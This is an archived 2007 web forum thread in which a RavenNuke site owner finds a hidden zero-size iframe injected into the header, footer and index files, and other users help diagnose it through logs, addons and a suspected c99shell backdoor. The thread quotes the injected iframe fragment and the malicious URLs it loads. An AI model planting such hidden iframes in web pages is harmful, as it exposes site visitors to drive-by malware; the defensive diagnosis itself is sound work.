site hacked??

Involved Joined: Apr 22, 2006 Posts: 356

wow, I was in the middle of uploading the php-manual and my site was compromised. Three files were altered some how. Footer, header, and index.php all had an iframe tag added to the bottom of them containing this:

src='http://ayiosamvrosios.com/_tr/index.php' height=0 width=0 name='ad'>ad

This is an rn2.10 site, with sentinel 2.5.06. almost every setting is turned on. How would this be done and what is it?

Thanks Evil or Very Mad

Theme Guru Joined: Nov 01, 2003 Posts: 1006

What addons do you have installed on this site? Was it a pure RN site to start with or an upgrade or downgrade from another version of nuke?

registered · Posted: Tue Apr 24, 2007 8:17 pm

Time to get some access logs and go searching. If your Sentinel database is still there and you have the tracking enabled, look at those logs too.

Are you using any addons with known security problems... vWar, Coppermine, etc?

Posted: Tue Apr 24, 2007 9:07 pm

It was a fresh install of rn files and an upgraded db from rn7.6.2.02.

I have g2 2.1.1 installed, ns contact plus2.4, an address list module that simply gives all members in an address list manner, Sommaire 3 from montego, gcalender 1.4.1 from gremmie, montego's approve membership lite, subscription 2.0 module from western studios. I did have to edit the header file for the subscription mod. I had to add

//remove subscribers mod
require 'modules/Subscription/includes/remove_subscr.php';

to it.

Sentinel showed the ip in the tracked db so I added it to the blocked list.

I am having my host look at the logs.

I forgot, I had uploaded php manual, php nuke how to, pear manual, nuke tools3. I believe I was in the middle of uploading the php manual when it happened based on the time stamps.

Posted: Wed Apr 25, 2007 5:45 am

If Sentinel shows the IP in tracked ip section of Sentinel, you should also be able to see what strings they were using. Also if you know roughly the date and time it should help you, or your host to find it within your logs.

Posted: Wed Apr 25, 2007 6:12 am

Where exactly would I look for the strings? Just in the logs?

Thanks.

Posted: Wed Apr 25, 2007 6:28 am

When you go into 'Display Tracked IP's' you should see on the right handside four buttons, under the title 'Functions'.
Click on the 2nd button which is called 'View'. This should open another window and display the strings the IP has used (hopefully).

Posted: Wed Apr 25, 2007 6:35 am

I had already added it to the blocked list. This is what it showed:

locked IP: 74.6.73.235
User:
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Blocked on: 2007-04-24 22:01:21
Notes: attached site
Reason: Abuse-Admin

Query String:
Get String:
Post String:
Forwarded For: none
Client IP: none
Remote Address: 74.6.73.235
Remote Port: 33702
Request Method: GET

under the strings, it shows this

www.themizefamily.net/modules.php?name=Pics&g2_itemId=783

That is an image in the gallery.

Doesn't tell me much really.

Posted: Wed Apr 25, 2007 1:29 pm

That's it? Looks like its just Yahoo's search bot. While there are some reports that it is theoretically possible to cause such an attack to come from search engines, I've not actually seen one.

That doesn't look like one you want.

Posted: Wed Apr 25, 2007 6:07 pm

I agree with Evaders. That string you posted looks like a standard Gallery link. I'd try to find the IP of ayiosamvrosios.com and look in your log for similar ips. Do you have direct access to the log? A lot of these attacks come from similar IP's like 87.* or 83.* and if you search your log for these you can narrow it down considerably. I'd find out what the first two digits of ayiosamvrosios.com are and try searching for IPs with their first two digits in your log.

Also, I'd check my directories for any strange new files or any standard ones that have been altered.

Sells PC To Pay For Divorce Joined: Posts: 5661

ok it was a bit of a search but the address

Code:

http://ayiosamvrosios.com/_tr/index.php

is pulling an iframe from here..

Code:

http://z72496.infobox.ru/index.php

calling a java-script..
explained here...
http://schinckel.blogsome.com/category/programming/javascript/

i dont think sentinel has anything to do with this.

Posted: Thu Apr 26, 2007 7:36 pm

If you dont mind me Jumping in here,

Do you allow uploads of ANYTHING on your site??

I cant think of one thing that could be used to execute a command to write to a file withing RavenNuke. Believe me when I say, I've tested every known and unknown exploit I could grab or create. Sentinel caught almost all of the known and a few of the ones I made.

But 100% of them FAILED, even Session manipulation took a dive.

Check all access logs that should be available to you in your control panel, Look for accesses that match NOTHING on your site.

For example, accesses like http://yoursite.com/blah.php

If you pulled it, see if there is a 404 error at the same time it was accessed(error logs).

It is my belief that you were backed doored, with something like a c99shell script.

Real problem is that I converted file types and hacked it enough to where I could upload it, but I had to hack it so much that the server would not allow execution in order to properly use such a script.

I hope that you find what you are looking for, and Im sure that this is a backdoor issue and not an exploit of RN.